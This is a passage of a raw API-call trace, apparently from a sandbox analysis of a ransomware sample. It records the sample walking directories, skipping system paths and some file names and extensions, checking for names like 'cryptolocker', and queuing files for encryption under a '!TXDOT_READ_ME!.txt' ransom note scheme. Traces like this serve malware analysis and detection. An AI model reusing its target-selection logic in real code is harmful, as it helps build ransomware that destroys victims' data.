ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0085.666] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0085.666] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0085.666] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1035", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035") returned="C:\\588bce7c90097ed212\\1035" [0085.667] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\") returned="C:\\588bce7c90097ed212\\1035\\" [0085.667] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" [0085.667] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.667] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0085.667] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0085.667] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0085.667] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0085.667] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0085.667] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0085.667] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0085.671] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0085.672] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0085.672] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0085.672] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0085.672] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0085.672] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0085.672] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0085.672] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.672] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.673] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0085.673] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0085.673] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0085.673] GetProcessHeap () returned 0xe30000 [0085.673] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0085.673] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1036", cAlternateFileName="")) returned 1 [0085.673] StrCmpW (psz1="1036", psz2=".") returned 1 [0085.673] StrCmpW (psz1="1036", psz2="..") returned 1 [0085.673] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0085.673] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0085.673] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1036", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1036") returned="C:\\588bce7c90097ed212\\1036" [0085.673] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\windows\\system32\\") returned 0x0 [0085.673] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\windows\\syswow64\\") returned 0x0 [0085.673] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\windows\\system\\") returned 0x0 [0085.673] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\windows\\winsxs\\") returned 0x0 [0085.673] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\appdata\\roaming\\") returned 0x0 [0085.673] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\appdata\\local\\") returned 0x0 [0085.673] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\appdata\\locallow\\") returned 0x0 [0085.673] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\all users\\microsoft\\") returned 0x0 [0085.673] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\inetpub\\logs\\") returned 0x0 [0085.673] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\boot\\") returned 0x0 [0085.673] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\perflogs\\") returned 0x0 [0085.673] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\programdata\\") returned 0x0 [0085.673] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\drivers\\") returned 0x0 [0085.673] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\wsus\\") returned 0x0 [0085.673] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\efstmpwp\\") returned 0x0 [0085.673] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\$recycle.bin\\") returned 0x0 [0085.673] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="crypt_detect") returned 0x0 [0085.673] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="cryptolocker") returned 0x0 [0085.674] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="ransomware") returned 0x0 [0085.674] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="C:\\WINDOWS") returned 0x0 [0085.674] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="C:\\Program Files (x86)") returned 0x0 [0085.674] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="C:\\Program Files") returned 0x0 [0085.674] GetProcessHeap () returned 0xe30000 [0085.674] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0085.674] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1036", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036") returned="C:\\588bce7c90097ed212\\1036" [0085.674] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\*") returned="C:\\588bce7c90097ed212\\1036\\*" [0085.674] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1036\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0085.674] StrCmpW (psz1=".", psz2=".") returned 0 [0085.674] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.674] StrCmpW (psz1="..", psz2=".") returned 1 [0085.674] StrCmpW (psz1="..", psz2="..") returned 0 [0085.674] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdc6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0085.674] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0085.674] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0085.674] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1036", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036") returned="C:\\588bce7c90097ed212\\1036" [0085.674] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\") returned="C:\\588bce7c90097ed212\\1036\\" [0085.674] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned="C:\\588bce7c90097ed212\\1036\\eula.rtf" [0085.674] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.674] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0085.674] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0085.674] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0085.674] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0085.674] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0085.674] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0085.674] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0085.674] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0085.674] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0085.674] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0085.675] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0085.675] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0085.675] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0085.675] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0085.675] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.675] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.675] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0085.675] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0085.675] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.675] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1036\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" [0085.675] SetEvent (hEvent=0x408) returned 1 [0085.675] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x14412, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0085.675] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0085.675] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0085.675] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1036", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036") returned="C:\\588bce7c90097ed212\\1036" [0085.675] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\") returned="C:\\588bce7c90097ed212\\1036\\" [0085.675] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" [0085.675] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.675] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0085.675] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0085.675] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0085.675] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0085.675] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0085.675] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0085.675] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0085.675] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0085.675] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0085.675] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0085.675] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0085.675] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0085.675] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0085.676] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0085.676] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.676] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.676] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0085.676] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0085.690] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.690] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" [0085.690] SetEvent (hEvent=0x408) returned 1 [0085.692] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0085.692] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0085.692] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0085.692] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1036", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036") returned="C:\\588bce7c90097ed212\\1036" [0085.692] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\") returned="C:\\588bce7c90097ed212\\1036\\" [0085.692] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" [0085.693] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.693] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0085.693] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0085.693] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0085.693] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0085.693] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0085.693] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0085.693] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0085.693] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0085.693] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0085.693] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0085.693] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0085.693] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0085.696] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0085.697] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0085.697] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.697] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.697] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0085.697] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0085.697] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0085.697] GetProcessHeap () returned 0xe30000 [0085.697] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0085.697] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1037", cAlternateFileName="")) returned 1 [0085.697] StrCmpW (psz1="1037", psz2=".") returned 1 [0085.697] StrCmpW (psz1="1037", psz2="..") returned 1 [0085.698] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0085.698] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0085.698] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1037", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1037") returned="C:\\588bce7c90097ed212\\1037" [0085.698] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\windows\\system32\\") returned 0x0 [0085.698] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\windows\\syswow64\\") returned 0x0 [0085.698] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\windows\\system\\") returned 0x0 [0085.698] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\windows\\winsxs\\") returned 0x0 [0085.698] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\appdata\\roaming\\") returned 0x0 [0085.698] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\appdata\\local\\") returned 0x0 [0085.698] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\appdata\\locallow\\") returned 0x0 [0085.698] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\all users\\microsoft\\") returned 0x0 [0085.698] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\inetpub\\logs\\") returned 0x0 [0085.698] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\boot\\") returned 0x0 [0085.698] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\perflogs\\") returned 0x0 [0085.698] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\programdata\\") returned 0x0 [0085.698] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\drivers\\") returned 0x0 [0085.698] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\wsus\\") returned 0x0 [0085.698] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\efstmpwp\\") returned 0x0 [0085.698] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\$recycle.bin\\") returned 0x0 [0085.698] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="crypt_detect") returned 0x0 [0085.698] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="cryptolocker") returned 0x0 [0085.698] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="ransomware") returned 0x0 [0085.698] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="C:\\WINDOWS") returned 0x0 [0085.698] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="C:\\Program Files (x86)") returned 0x0 [0085.698] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="C:\\Program Files") returned 0x0 [0085.698] GetProcessHeap () returned 0xe30000 [0085.698] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0085.698] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1037", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037") returned="C:\\588bce7c90097ed212\\1037" [0085.698] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\*") returned="C:\\588bce7c90097ed212\\1037\\*" [0085.698] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1037\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2770 [0085.699] StrCmpW (psz1=".", psz2=".") returned 0 [0085.699] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.699] StrCmpW (psz1="..", psz2=".") returned 1 [0085.699] StrCmpW (psz1="..", psz2="..") returned 0 [0085.699] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0085.699] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0085.699] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0085.699] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1037", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037") returned="C:\\588bce7c90097ed212\\1037" [0085.699] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037", psz2="\\", cchMax=1078 